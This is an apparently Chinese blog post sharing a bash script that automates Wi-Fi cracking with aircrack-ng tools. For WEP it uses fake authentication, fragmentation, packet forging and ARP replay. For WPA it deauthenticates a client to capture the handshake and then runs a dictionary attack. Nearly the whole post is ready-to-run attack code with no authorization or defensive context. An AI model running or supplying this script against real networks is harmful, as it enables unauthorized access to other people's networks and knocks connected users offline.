将之前破解wep脚本进行了完善,添加了破解wap的代码。

脚本放在google doc了。

gentoo-pjq 320 # cat crack.sh
#########################################################################
# Author: pengjianqing@gmail.com
# Created Time: Fri 09 Oct 2009 09:37:43 PM CST
# File Name: crack.sh
# Description:Welcome to visit:www.impjq.net for more information.
#Referece:http://www.cbifamily.com/hard/harddim/2009-05-13/1242203280d86121.html
#########################################################################
#!/bin/bash

#Settings
CHANNEL=6
TMP=tmp.txt
PASSWDTXT=/media/sdb9/superdic.txt
ENCRYPTTYPE=64


clean()
{
    rm *.cap
    rm fragment*.xor
    rm *.ivs
    rm *.csv
    rm ${TMP}
    rm *.netxml
}



getwepkey()
{
    echo "Run:aircrack-ng -n 64 -b ${AP_MAC} crackwep-01.ivs to get the key!"
    echo "**************************************************************************"
    echo "Get the key:"
    ls -lht *.ivs
    read -p "Input the pack file name,like:crackwep-01.ivs" RESULT
    echo "aircrack-ng -n ${TYPE} -b ${AP_MAC} ${RESULT}"
    aircrack-ng -n ${ENCRYPTTYPE} -b ${AP_MAC} ${RESULT}
}

crackwep()
{
    echo "Now choose crackwep()"
    echo "Display the details on the Channel:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &>${TMP}"
    echo "Please wait for about 30 seconds,then Ctrl+C to interrupt it."
    echo "use tail -f ${TMP} to see the details"
    airodump-ng --ivs -w crackwep -c ${CHANNEL} mon0 &>${TMP}
    echo "cat ${TMP}"
    cat ${TMP}

    read -p "Please input essid:" ESSID
    echo "grep ${ESSID} ${TMP}"
    AP_MAC=`grep ${ESSID} ${TMP}|cut -d " " -f2|head -n 1`
    echo "AP_MAC:${AP_MAC}"

    PC_MAC=`ifconfig|grep wlan0|cut -d " " -f10|head -n 1`
    echo "PC_MAC:${PC_MAC}"

    echo "欺骗模式:aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0"
    aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0
    read -p "Association successful?:(y/n):" RESULT

    echo "aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0"
    aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0

    echo "check whether create the fragment-xxxx-xxxx.xor file?"
    ls -lht *.xor

    read -p "Create the fragment-xxxx-xxxx.xor file?(y/n):" RESULT

    echo "packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp"
    packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp


    echo "**************************************************************************"
    echo "Now you should run:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &>${TMP} "
    echo "to check the \#Data  grow to 10000"
    echo "**************************************************************************"
    echo "Run:aircrack-ng -n 64 -b ${AP_MAC} crackwep-01.ivs to get the key!"
    echo "**************************************************************************"
    echo "aireplay-ng -2 -r mrarp -x 256 mon0"
    aireplay-ng -2 -r mrarp -x 256 mon0

#    getwepkey
}


crackwap()
{
    echo "Now choose crackwap()"
    echo "**************************************************************************"
    echo "Display the details on the Channel:airodump-ng  -w crackwap -c ${CHANNEL} mon0 &>${TMP}"
    echo "Please wait for about 30 seconds,then Ctrl+C to interrupt it."
    echo "**************************************************************************"
    echo "NOTE:Your should start this in another terminal:airodump-ng -w crackwap -c ${CHANNEL} mon0"
    echo "**************************************************************************"
    echo "use tail -f ${TMP} to see the details"
    echo airodump-ng -w crackwap -c ${CHANNEL} mon0 &>${TMP}
    airodump-ng -w crackwap -c ${CHANNEL} mon0 &>${TMP}
    echo "cat ${TMP}"
    cat ${TMP}

    read -p "Please input essid:" ESSID
    echo "grep ${ESSID} ${TMP}"
    AP_MAC=`grep ${ESSID} ${TMP}|cut -d " " -f2|head -n 1`
    echo "AP_MAC:${AP_MAC}"

    PC_MAC=`ifconfig|grep wlan0|cut -d " " -f10|head -n 1`
    echo "PC_MAC:${PC_MAC}"

    STATION_MAC=`grep ${AP_MAC}  ${TMP}|sort|uniq|cut -d " " -f4|head -n 1`
    echo "STATION_MAC:${STATION_MAC}"

    read -p "All the MAC is right?(y/n):" RESULT


    case "${RESULT}" in
	"y" ) ;;
	"n" ) echo "Reset the MAC:";read -p "AP_MAC:" PC_MAC;read -p "STATION_MAC:" STATION_MAC;;

	*   ) echo "Wrong selection";;
    esac


    echo "aireplay-ng -0 10 -a ${AP_MAC} -c ${STATION_MAC} mon0"
    aireplay-ng -0 10 -a ${AP_MAC} -c ${STATION_MAC} mon0

    read -p "Get the *.cab file ok?(y/n):" RESULT

    echo "Now Crack the WAP with ${PASSWDTXT}"
    echo "aircrack-ng -w ${PASSWDTXT} -b  ${AP_MAC} crackwap*.cap"
    aircrack-ng –w  ${PASSWDTXT} -b  ${AP_MAC} crackwap*.cap
}

menu()
{
    echo "Main Menu"
    echo "Please choose your action:"
    echo "1.wep"
    echo "2.wap"
    echo "q.quit"
}

clean
echo "start wlan0 monitor:airmon-ng start wlan0 ${CHANNEL}"
airmon-ng stop mon0
airmon-ng start wlan0 ${CHANNEL}
echo "airmon-ng"
read -p "start monitor ok:y/n?:" RESULT


menu
read -p "Please choose:" CHOOSE


while [ "${CHOOSE}" != "q" ];do
    case "${CHOOSE}" in
	"1" ) crackwep;;
	"2" ) crackwap;;
	"q" ) exit 0;;

	*   ) echo "Wrong selection";;
    esac
    menu
    read -p "Please Select:" CHOOSE
    clear

done
破解wep/wap脚本

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.